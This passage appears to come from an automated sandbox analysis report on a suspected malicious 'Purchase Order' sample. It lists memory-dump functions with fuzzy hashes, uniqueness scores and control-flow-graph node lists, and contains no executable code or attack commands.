                                                                                                            Function 06E9A408 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: abf9ee02151fbb912b87bd5f3ba49e6da910db80ad066718bb1922fdaa383ba8
                                                                                                            • Instruction ID: 9fb0ca7d337910ca0d2c78a19cfeb3393dff923bdf77e0eaeed2d5dab9841799
                                                                                                            • Opcode Fuzzy Hash: abf9ee02151fbb912b87bd5f3ba49e6da910db80ad066718bb1922fdaa383ba8
                                                                                                            • Instruction Fuzzy Hash: 41A1B375E012188FEB68CF6AD944B9DBBF2BF89300F14D0AAD409A7255DB305A85CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9C9D8 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37d8b4492c5e551dad2fb98ce8c81c5e04e6931d99d6cead534a65f75a90c32b
                                                                                                            • Instruction ID: f3b54d8fd13151dd69547aa37e688aa78180673116039351ca3f5463597fdffa
                                                                                                            • Opcode Fuzzy Hash: 37d8b4492c5e551dad2fb98ce8c81c5e04e6931d99d6cead534a65f75a90c32b
                                                                                                            • Instruction Fuzzy Hash: 10A1A4B5E016188FEB68DF6AD944B9DBBF2AF89300F14D0AAD40DA7254DB305A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9BD38 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23344bdb8c381210897b9bb81760aa41f911f8cde9e7a5d3ec221b2e5ebaac1f
                                                                                                            • Instruction ID: 757bf0d37bea71dd0ed9609340c74c26c728bd8b43a25a3cae9278336cc3778b
                                                                                                            • Opcode Fuzzy Hash: 23344bdb8c381210897b9bb81760aa41f911f8cde9e7a5d3ec221b2e5ebaac1f
                                                                                                            • Instruction Fuzzy Hash: 5FA1A375E01218CFEB68CF6AD944B9EBBF2BF89300F14D0AAD409A7255DB305A85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9AA58 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c069c87bed9992abd6b6ff3bf98cf4e8cb6fb1c7b5e37a62804cbbe00df2958
                                                                                                            • Instruction ID: 0c23577ff19ac76c492251eb01e40d32b771de77dd73588851277d7ad383857e
                                                                                                            • Opcode Fuzzy Hash: 5c069c87bed9992abd6b6ff3bf98cf4e8cb6fb1c7b5e37a62804cbbe00df2958
                                                                                                            • Instruction Fuzzy Hash: EDA1A475E012188FEB68CF6AD944B9EFBF2AF89300F14D0AAD409A7254DB345A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9B0A0 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bafe53ce6c1942f98f0a6b0051863c39cbbe90bd10e9c96c4a6db2b3e1eb4e8a
                                                                                                            • Instruction ID: b19f52c3f00ba40f298cfa27a7eebc81c7d0952340922837c3d73acf92a7eb7b
                                                                                                            • Opcode Fuzzy Hash: bafe53ce6c1942f98f0a6b0051863c39cbbe90bd10e9c96c4a6db2b3e1eb4e8a
                                                                                                            • Instruction Fuzzy Hash: 78A1A475E012188FEB68CF6AD944B9EFBF2BF89300F14D0AAD409A7254DB305A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9D028 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f912832bee0c6a12e306fdd456e267db0c2cf0a7459ee1ea935372f146db172
                                                                                                            • Instruction ID: 347e0dc1edb2187ac13b07c2d5edc6968145d47ff4edef8ef612fbfe0e1d706d
                                                                                                            • Opcode Fuzzy Hash: 9f912832bee0c6a12e306fdd456e267db0c2cf0a7459ee1ea935372f146db172
                                                                                                            • Instruction Fuzzy Hash: 20A1A471E016288FEB68CF6AC944B9DFBF2AF89300F14D0AAD40CA7254DB345A85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E91191 Relevance: .2, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61e55763a736ba83baa9004d3011eea234ea5e42a67f244691518ff49882caab
                                                                                                            • Instruction ID: f430dbab75719ac7bc7b58dfb4ff10145252a58a2077bfff4f099c88e42f4f1e
                                                                                                            • Opcode Fuzzy Hash: 61e55763a736ba83baa9004d3011eea234ea5e42a67f244691518ff49882caab
                                                                                                            • Instruction Fuzzy Hash: 7F81A074E022299FDB64DF69D984BDDBBB2BF89300F1081EAD809A7254DB305E80CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9B090 Relevance: .2, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c61eeb757aa6ead6645d63f8844bba29b468984c96757cad7ea7ea93973eaf3
                                                                                                            • Instruction ID: 280395dab4a786d98c183f8d89b751494921a4a5127a436cb519bbe37f881566
                                                                                                            • Opcode Fuzzy Hash: 2c61eeb757aa6ead6645d63f8844bba29b468984c96757cad7ea7ea93973eaf3
                                                                                                            • Instruction Fuzzy Hash: 67819371E01618CFEB68CF6AD944B9EBAF2AF89300F14C1AAD40DA7254DB304A85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9AA48 Relevance: .2, Instructions: 165COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 58dea6e68e23f4ded67afbe06ac54d054a6f6337e72c2b414c4d73bcfd114a95
                                                                                                            • Instruction ID: b0c3bb16bbf659f131ba3c0b46fd405a67db874002d91c78ed72f25b98c5d174
                                                                                                            • Opcode Fuzzy Hash: 58dea6e68e23f4ded67afbe06ac54d054a6f6337e72c2b414c4d73bcfd114a95
                                                                                                            • Instruction Fuzzy Hash: 1C718571E016188FEB68CF6AD944B9EFAF2AF89300F14C1AAD40DA7254DB744A85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9D021 Relevance: .2, Instructions: 160COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c105734ffda70241be519ba1652880e4e7233f258f0e1cb86cf5a44984e44579
                                                                                                            • Instruction ID: 246619307a407cb6b706ec63fa9a77df47bfecd0e856113b91296f63ffc724d4
                                                                                                            • Opcode Fuzzy Hash: c105734ffda70241be519ba1652880e4e7233f258f0e1cb86cf5a44984e44579
                                                                                                            • Instruction Fuzzy Hash: 45718671E016288FEB68CF6AD944B9DFAF2AF89300F14C1AAD40DA7254DB345A85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9C9C8 Relevance: .1, Instructions: 112COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3174ddc3f4e1ec63f68396d03ec80ef7e1dafeb8e81f8dd442f802a7dfae280
                                                                                                            • Instruction ID: e0caf077c0d2df08b9438c26058eecbf4ab6042f631d246fa11a36154295d5e5
                                                                                                            • Opcode Fuzzy Hash: c3174ddc3f4e1ec63f68396d03ec80ef7e1dafeb8e81f8dd442f802a7dfae280
                                                                                                            • Instruction Fuzzy Hash: 91418C71E016188BEB58CF6BDD4578AFAF3AFC9310F14C1AAC50CA6264EB340A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E98602 Relevance: .1, Instructions: 111COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f760d8d5ac40216428228d93bbb20a10aaa3e73f7af6d2d9e9a3da2f90a80d6
                                                                                                            • Instruction ID: 3c650115bdaef6a2c65b1f46b05713db95e1ff3c55c6747b64fd6562cb6c29ae
                                                                                                            • Opcode Fuzzy Hash: 8f760d8d5ac40216428228d93bbb20a10aaa3e73f7af6d2d9e9a3da2f90a80d6
                                                                                                            • Instruction Fuzzy Hash: 5341B4B0E012088BEB58DFAAC9547DEFAF2AF89300F14D46AC418BB264DB754945CF64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9D661 Relevance: .1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2c14822cef24ec4311cc9dc984bc4fd48cecf866cd2bb008a06426da64099e9
                                                                                                            • Instruction ID: 7ded90f5570900dbbcf0e474a0ebad5542a6616a4b54b93046c942ab69561735
                                                                                                            • Opcode Fuzzy Hash: b2c14822cef24ec4311cc9dc984bc4fd48cecf866cd2bb008a06426da64099e9
                                                                                                            • Instruction Fuzzy Hash: 774179B1E016188BEB58CF6BDD457C9FAF3AFC8310F04C1AAC50CA6264DB740A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9A3FA Relevance: .1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dbf04c18a56063977c829101fa518cfc049e346f50b3cef1b36e22ee66f95f3b
                                                                                                            • Instruction ID: 42797cc777d4cfb28393ddc28924c5a868f612c3cdbb87b3beec0443a2a27c51
                                                                                                            • Opcode Fuzzy Hash: dbf04c18a56063977c829101fa518cfc049e346f50b3cef1b36e22ee66f95f3b
                                                                                                            • Instruction Fuzzy Hash: 81414EB1E016188BEB58CF6BDD457C9FAF3AFC8314F14C1AAD50CA6264DB740A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9C378 Relevance: .1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: abdbc3c805da658e48cfd211fbcbf8947a62cedce9e5f6cb1fb41f79b0744a00
                                                                                                            • Instruction ID: 9aeac34bf7b255299c08a6d8225c58fd8333a040b6cd218b9f1d5c3f305a9304
                                                                                                            • Opcode Fuzzy Hash: abdbc3c805da658e48cfd211fbcbf8947a62cedce9e5f6cb1fb41f79b0744a00
                                                                                                            • Instruction Fuzzy Hash: 5F418CB1E016188BEB58CF6BC9457CDFAF3AFC8314F14C1AAD50CA6264EB740A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9B6D8 Relevance: .1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 05078f6486645d7578f1e4dcb43aef00a9f289733d8f450423ff5746012d3640
                                                                                                            • Instruction ID: e8b76002280bb5690b792b5b4573677402830ded034953ba4eb356e93373010a
                                                                                                            • Opcode Fuzzy Hash: 05078f6486645d7578f1e4dcb43aef00a9f289733d8f450423ff5746012d3640
                                                                                                            • Instruction Fuzzy Hash: D4416CB1D016188BEB58CF6BD9457CEFAF3AFC9310F14C1AAC50CA6264DB740A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9BD36 Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d2c5d8ce00920893ef5ee51e4db746a164eb0b0380320a4f47fc06ffc502341
                                                                                                            • Instruction ID: e7ba74f051607f0ad9723bded5dcfb35502b97c86f6b6ca7f12b819a0db794bd
                                                                                                            • Opcode Fuzzy Hash: 8d2c5d8ce00920893ef5ee51e4db746a164eb0b0380320a4f47fc06ffc502341
                                                                                                            • Instruction Fuzzy Hash: 1D4139B1E016188BEB58CF6BD9457CAFAF3AFC9304F14C1AAC50CA6264DB744A858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01666EB8 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 1666eb8-1666eed 1 1666ef3-1666f16 0->1 2 166731c-1667320 0->2 11 1666fc4-1666fc8 1->11 12 1666f1c-1666f29 1->12 3 1667322-1667336 2->3 4 1667339-1667347 2->4 9 16673b8-16673cd 4->9 10 1667349-166735e 4->10 18 16673d4-16673e1 9->18 19 16673cf-16673d2 9->19 20 1667365-1667372 10->20 21 1667360-1667363 10->21 15 1667010-1667019 11->15 16 1666fca-1666fd8 11->16 25 1666f2b-1666f36 12->25 26 1666f38 12->26 22 166742f 15->22 23 166701f-1667029 15->23 16->15 30 1666fda-1666ff5 16->30 27 16673e3-166741e 18->27 19->27 28 1667374-16673b5 20->28 21->28 31 1667434-1667464 22->31 23->2 29 166702f-1667038 23->29 32 1666f3a-1666f3c 25->32 26->32 76 1667425-166742c 27->76 35 1667047-1667053 29->35 36 166703a-166703f 29->36 57 1666ff7-1667001 30->57 58 1667003 30->58 61 1667466-166747c 31->61 62 166747d-1667484 31->62 32->11 39 1666f42-1666fa4 32->39 35->31 37 1667059-166705f 35->37 36->35 43 1667306-166730a 37->43 44 1667065-1667075 37->44 89 1666fa6 39->89 90 1666faa-1666fc1 39->90 43->22 49 1667310-1667316 43->49 59 1667077-1667087 44->59 60 1667089-166708b 44->60 49->2 49->29 63 1667005-1667007 57->63 58->63 64 166708e-1667094 59->64 60->64 63->15 70 1667009 63->70 64->43 71 166709a-16670a9 64->71 70->15 73 1667157-1667182 call 1666d00 * 2 71->73 74 16670af 71->74 91 166726c-1667286 73->91 92 1667188-166718c 73->92 78 16670b2-16670c3 74->78 78->31 80 16670c9-16670db 78->80 80->31 83 16670e1-16670f9 80->83 145 16670fb call 1667488 83->145 146 16670fb call 1667498 83->146 85 1667101-1667111 85->43 88 1667117-166711a 85->88 93 1667124-1667127 88->93 94 166711c-1667122 88->94 89->90 90->11 91->2 112 166728c-1667290 91->112 92->43 95 1667192-1667196 92->95 93->22 96 166712d-1667130 93->96 94->93 94->96 99 16671be-16671c4 95->99 100 1667198-16671a5 95->100 101 1667132-1667136 96->101 102 1667138-166713b 96->102 104 16671c6-16671ca 99->104 105 16671ff-1667205 99->105 115 16671a7-16671b2 100->115 116 16671b4 100->116 101->102 103 1667141-1667145 101->103 102->22 102->103 103->22 110 166714b-1667151 103->110 104->105 111 16671cc-16671d5 104->111 107 1667207-166720b 105->107 108 1667211-1667217 105->108 107->76 107->108 113 1667223-1667225 108->113 114 1667219-166721d 108->114 110->73 110->78 117 16671d7-16671dc 111->117 118 16671e4-16671fa 111->118 119 1667292-166729c call 1665ba8 112->119 120 16672cc-16672d0 112->120 121 1667227-1667230 113->121 122 166725a-166725c 113->122 114->43 114->113 123 16671b6-16671b8 115->123 116->123 117->118 118->43 119->120 133 166729e-16672b3 119->133 120->76 125 16672d6-16672da 120->125 128 1667232-1667237 121->128 129 166723f-1667255 121->129 122->43 130 1667262-1667269 122->130 123->43 123->99 125->76 131 16672e0-16672ed 125->131 128->129 129->43 136 16672ef-16672fa 131->136 137 16672fc 131->137 133->120 142 16672b5-16672ca 133->142 139 16672fe-1667300 136->139 137->139 139->43 139->76 142->2 142->120 145->85 146->85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (ofq$(ofq$(ofq$(ofq$(ofq$(ofq$,jq$,jq
                                                                                                            • API String ID: 0-3756152659
                                                                                                            • Opcode ID: 8d33d1c1f2515b26f779bce5c56315e4edcf0bd30de80ff47628e0e9356854bf
                                                                                                            • Instruction ID: a96da0dde631bfe3c24e40e2fc1cfecea9416a4a3f7c9785962ce3b7fc82d688
                                                                                                            • Opcode Fuzzy Hash: 8d33d1c1f2515b26f779bce5c56315e4edcf0bd30de80ff47628e0e9356854bf
                                                                                                            • Instruction Fuzzy Hash: 8B123830A01209DFCB15DF69D984A9EBBFABF48318F148559E915EB361DB30ED81CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01667850 Relevance: 3.2, Strings: 2, Instructions: 690COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1992 1667850-1667d3e 2067 1667d44-1667d54 1992->2067 2068 1668290-16682c5 1992->2068 2067->2068 2069 1667d5a-1667d6a 2067->2069 2072 16682c7-16682cc 2068->2072 2073 16682d1-16682ef 2068->2073 2069->2068 2071 1667d70-1667d80 2069->2071 2071->2068 2074 1667d86-1667d96 2071->2074 2075 16683b6-16683bb 2072->2075 2086 1668366-1668372 2073->2086 2087 16682f1-16682fb 2073->2087 2074->2068 2076 1667d9c-1667dac 2074->2076 2076->2068 2077 1667db2-1667dc2 2076->2077 2077->2068 2079 1667dc8-1667dd8 2077->2079 2079->2068 2080 1667dde-1667dee 2079->2080 2080->2068 2082 1667df4-1667e04 2080->2082 2082->2068 2083 1667e0a-1667e1a 2082->2083 2083->2068 2085 1667e20-166828f 2083->2085 2091 1668374-1668380 2086->2091 2092 1668389-1668395 2086->2092 2087->2086 2093 16682fd-1668309 2087->2093 2091->2092 2100 1668382-1668387 2091->2100 2101 1668397-16683a3 2092->2101 2102 16683ac-16683ae 2092->2102 2098 166832e-1668331 2093->2098 2099 166830b-1668316 2093->2099 2104 1668333-166833f 2098->2104 2105 1668348-1668354 2098->2105 2099->2098 2111 1668318-1668322 2099->2111 2100->2075 2101->2102 2113 16683a5-16683aa 2101->2113 2102->2075 2179 16683b0 call 1668849 2102->2179 2104->2105 2116 1668341-1668346 2104->2116 2108 1668356-166835d 2105->2108 2109 16683bc-16683d3 2105->2109 2108->2109 2114 166835f-1668364 2108->2114 2111->2098 2120 1668324-1668329 2111->2120 2113->2075 2114->2075 2116->2075 2120->2075 2179->2075
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $fq$$fq
                                                                                                            • API String ID: 0-2537786760
                                                                                                            • Opcode ID: fa171c42dd1009738ba5ea2f485207d95a1fc71e69802ff5c607b14abcfb179d
                                                                                                            • Instruction ID: dfb5889efc6f98131928d7848432019f1ba491ac992b257e3b7199a158b98a62
                                                                                                            • Opcode Fuzzy Hash: fa171c42dd1009738ba5ea2f485207d95a1fc71e69802ff5c607b14abcfb179d
                                                                                                            • Instruction Fuzzy Hash: 1052EE74A012198FEB54DBE8C850B9EBBB6FF94300F1081A9C20A6B3A5DF359D85DF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01668849 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2329 1668849-1668865 2330 1668867-166886c 2329->2330 2331 1668871-166887d 2329->2331 2332 1668c06-1668c0b 2330->2332 2334 166887f-1668881 2331->2334 2335 166888d-1668892 2331->2335 2336 1668889-166888b 2334->2336 2335->2332 2336->2335 2337 1668897-16688a3 2336->2337 2339 16688a5-16688b1 2337->2339 2340 16688b3-16688b8 2337->2340 2339->2340 2342 16688bd-16688c8 2339->2342 2340->2332 2344 1668972-166897d 2342->2344 2345 16688ce-16688d9 2342->2345 2348 1668983-1668992 2344->2348 2349 1668a20-1668a2c 2344->2349 2350 16688ef 2345->2350 2351 16688db-16688ed 2345->2351 2360 1668994-166899e 2348->2360 2361 16689a3-16689b2 2348->2361 2358 1668a2e-1668a3a 2349->2358 2359 1668a3c-1668a4e 2349->2359 2352 16688f4-16688f6 2350->2352 2351->2352 2356 1668916-166891b 2352->2356 2357 16688f8-1668907 2352->2357 2356->2332 2357->2356 2363 1668909-1668914 2357->2363 2358->2359 2368 1668a7c-1668a87 2358->2368 2376 1668a72-1668a77 2359->2376 2377 1668a50-1668a5c 2359->2377 2360->2332 2369 16689d6-16689df 2361->2369 2370 16689b4-16689c0 2361->2370 2363->2356 2374 1668920-1668929 2363->2374 2381 1668a8d-1668a96 2368->2381 2382 1668b69-1668b74 2368->2382 2383 16689f5 2369->2383 2384 16689e1-16689f3 2369->2384 2379 16689c2-16689c7 2370->2379 2380 16689cc-16689d1 2370->2380 2389 1668935-1668944 2374->2389 2390 166892b-1668930 2374->2390 2376->2332 2394 1668a5e-1668a63 2377->2394 2395 1668a68-1668a6d 2377->2395 2379->2332 2380->2332 2396 1668aac 2381->2396 2397 1668a98-1668aaa 2381->2397 2398 1668b76-1668b80 2382->2398 2399 1668b9e-1668bad 2382->2399 2386 16689fa-16689fc 2383->2386 2384->2386 2386->2349 2392 16689fe-1668a0a 2386->2392 2407 1668946-1668952 2389->2407 2408 1668968-166896d 2389->2408 2390->2332 2409 1668a16-1668a1b 2392->2409 2410 1668a0c-1668a11 2392->2410 2394->2332 2395->2332 2400 1668ab1-1668ab3 2396->2400 2397->2400 2412 1668b97-1668b9c 2398->2412 2413 1668b82-1668b8e 2398->2413 2414 1668c01 2399->2414 2415 1668baf-1668bbe 2399->2415 2405 1668ab5-1668ac1 2400->2405 2406 1668ac3 2400->2406 2416 1668ac8-1668aca 2405->2416 2406->2416 2423 1668954-1668959 2407->2423 2424 166895e-1668963 2407->2424 2408->2332 2409->2332 2410->2332 2412->2332 2413->2412 2426 1668b90-1668b95 2413->2426 2414->2332 2415->2414 2427 1668bc0-1668bd8 2415->2427 2417 1668ad6-1668ae9 2416->2417 2418 1668acc-1668ad1 2416->2418 2428 1668b21-1668b2b 2417->2428 2429 1668aeb 2417->2429 2418->2332 2423->2332 2424->2332 2426->2332 2439 1668bfa-1668bff 2427->2439 2440 1668bda-1668bf8 2427->2440 2435 1668b2d-1668b39 call 16682b8 2428->2435 2436 1668b4a-1668b56 2428->2436 2430 1668aee-1668aff call 16682b8 2429->2430 2441 1668b06-1668b0b 2430->2441 2442 1668b01-1668b04 2430->2442 2446 1668b40-1668b45 2435->2446 2447 1668b3b-1668b3e 2435->2447 2449 1668b5f 2436->2449 2450 1668b58-1668b5d 2436->2450 2439->2332 2440->2332 2441->2332 2442->2441 2445 1668b10-1668b13 2442->2445 2451 1668c0c-1668c20 2445->2451 2452 1668b19-1668b1f 2445->2452 2446->2332 2447->2436 2447->2446 2453 1668b64 2449->2453 2450->2453 2456 1668c72-1668c79 2451->2456 2457 1668c22-1668c23 2451->2457 2452->2428 2452->2430 2453->2332 2460 1668cae-1668cc0 2456->2460 